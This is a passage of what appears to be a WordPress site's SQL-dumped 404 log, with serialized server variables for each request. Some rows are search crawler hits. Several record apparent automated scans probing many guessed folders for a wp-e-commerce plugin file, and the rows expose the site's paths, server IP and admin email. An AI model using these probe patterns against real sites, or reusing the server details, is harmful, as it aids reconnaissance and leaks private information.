19:05:09',35679256,37484256,'https://bintara.com.my/v2/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js',1,0,'193.70.2.138'),(28075,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/hp-designjet-printers/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/hp-designjet-printers/\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/hp-designjet-printers/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaYfcHTLTfzmaEv6rGKZSAAAANA\";s:12:\"REDIRECT_URL\";s:23:\"/hp-designjet-printers/\";s:11:\"REMOTE_ADDR\";s:13:\"157.55.39.161\";s:11:\"REMOTE_PORT\";s:5:\"11133\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/hp-designjet-printers/\";s:10:\"SCRIPT_URL\";s:23:\"/hp-designjet-printers/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaYfcHTLTfzmaEv6rGKZSAAAANA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571168112.904\";s:12:\"REQUEST_TIME\";s:10:\"1571168112\";}}','notice','2019-10-15 19:35:15','2019-10-15 19:35:13',34389344,36188488,'https://bintara.com.my/hp-designjet-printers/',1,0,'157.55.39.161'),(28076,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:40:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"/blog/tag/logitech-vc/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:66:\"Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:44:\"https://bintara.com.my/blog/tag/logitech-vc/\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/blog/tag/logitech-vc/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaYnvHTLTfzmaEv6rGKc5QAAAME\";s:12:\"REDIRECT_URL\";s:22:\"/blog/tag/logitech-vc/\";s:11:\"REMOTE_ADDR\";s:12:\"54.36.149.69\";s:11:\"REMOTE_PORT\";s:5:\"37258\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:44:\"https://bintara.com.my/blog/tag/logitech-vc/\";s:10:\"SCRIPT_URL\";s:22:\"/blog/tag/logitech-vc/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaYnvHTLTfzmaEv6rGKc5QAAAME\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571170236.7703\";s:12:\"REQUEST_TIME\";s:10:\"1571170236\";}}','notice','2019-10-15 20:10:39','2019-10-15 20:10:37',35422368,37224504,'https://bintara.com.my/blog/tag/logitech-vc/',1,0,'54.36.149.69'),(28077,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/toughbook-n1/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-n1/\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/toughbook-n1/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaYqSlVwATuNyQjXQnr1CgAAAVY\";s:12:\"REDIRECT_URL\";s:14:\"/toughbook-n1/\";s:11:\"REMOTE_ADDR\";s:13:\"157.55.39.145\";s:11:\"REMOTE_PORT\";s:4:\"9032\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-n1/\";s:10:\"SCRIPT_URL\";s:14:\"/toughbook-n1/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaYqSlVwATuNyQjXQnr1CgAAAVY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571170890.8154\";s:12:\"REQUEST_TIME\";s:10:\"1571170890\";}}','notice','2019-10-15 20:21:33','2019-10-15 20:21:31',34309664,36105976,'https://bintara.com.my/toughbook-n1/',1,0,'157.55.39.145'),(28078,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:92:\"/demo/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:114:\"https://bintara.com.my/demo/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:92:\"/demo/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaYqYHTLTfzmaEv6rGKeKAAAANc\";s:19:\"REDIRECT_SCRIPT_URI\";s:114:\"https://bintara.com.my/demo/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:92:\"/demo/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaYqYHTLTfzmaEv6rGKeKAAAANc\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"5.135.143.224\";s:11:\"REMOTE_PORT\";s:5:\"38097\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:114:\"https://bintara.com.my/demo/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:10:\"SCRIPT_URL\";s:92:\"/demo/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XaYqYHTLTfzmaEv6rGKeKAAAANc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571170912.5896\";s:12:\"REQUEST_TIME\";s:10:\"1571170912\";}}','notice','2019-10-15 20:21:54','2019-10-15 20:21:52',35285528,37080432,'https://bintara.com.my/demo/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js',1,0,'5.135.143.224'),(28079,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:91:\"/new/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:113:\"https://bintara.com.my/new/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:91:\"/new/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaYsHFVwATuNyQjXQnr1cAAAAUM\";s:19:\"REDIRECT_SCRIPT_URI\";s:113:\"https://bintara.com.my/new/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:91:\"/new/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaYsHFVwATuNyQjXQnr1cAAAAUM\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"151.80.54.15\";s:11:\"REMOTE_PORT\";s:5:\"52678\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:113:\"https://bintara.com.my/new/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:10:\"SCRIPT_URL\";s:91:\"/new/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XaYsHFVwATuNyQjXQnr1cAAAAUM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571171356.5827\";s:12:\"REQUEST_TIME\";s:10:\"1571171356\";}}','notice','2019-10-15 20:29:19','2019-10-15 20:29:16',35675800,37476384,'https://bintara.com.my/new/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js',1,0,'151.80.54.15'),(28080,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:92:\"/2019/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:114:\"https://bintara.com.my/2019/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:92:\"/2019/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaYuG3TLTfzmaEv6rGKgAAAAAMc\";s:19:\"REDIRECT_SCRIPT_URI\";s:114:\"https://bintara.com.my/2019/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:92:\"/2019/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaYuG3TLTfzmaEv6rGKgAAAAAMc\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"5.135.138.188\";s:11:\"REMOTE_PORT\";s:5:\"46304\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:114:\"https://bintara.com.my/2019/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:10:\"SCRIPT_URL\";s:92:\"/2019/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XaYuG3TLTfzmaEv6rGKgAAAAAMc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571171867.9488\";s:12:\"REQUEST_TIME\";s:10:\"1571171867\";}}','notice','2019-10-15 20:37:50','2019-10-15 20:37:48',35775816,37573840,'https://bintara.com.my/2019/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js',1,0,'5.135.138.188'),(28081,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:92:\"/news/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:114:\"https://bintara.com.my/news/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:92:\"/news/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaYvH3TLTfzmaEv6rGKglQAAANc\";s:19:\"REDIRECT_SCRIPT_URI\";s:114:\"https://bintara.com.my/news/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:92:\"/news/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaYvH3TLTfzmaEv6rGKglQAAANc\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"37.187.72.67\";s:11:\"REMOTE_PORT\";s:5:\"41388\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:114:\"https://bintara.com.my/news/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:10:\"SCRIPT_URL\";s:92:\"/news/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XaYvH3TLTfzmaEv6rGKglQAAANc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571172127.355\";s:12:\"REQUEST_TIME\";s:10:\"1571172127\";}}','notice','2019-10-15 20:42:09','2019-10-15 20:42:07',35281888,37085632,'https://bintara.com.my/news/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js',1,0,'37.187.72.67'),(28082,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:90:\"/v1/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:112:\"https://bintara.com.my/v1/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:90:\"/v1/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaY1r3TLTfzmaEv6rGKjuAAAANc\";s:19:\"REDIRECT_SCRIPT_URI\";s:112:\"https://bintara.com.my/v1/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:90:\"/v1/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaY1r3TLTfzmaEv6rGKjuAAAANc\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"188.213.175.168\";s:11:\"REMOTE_PORT\";s:5:\"56353\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:112:\"https://bintara.com.my/v1/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:10:\"SCRIPT_URL\";s:90:\"/v1/wp-content/plugins/wp-e-commerce/wpsc-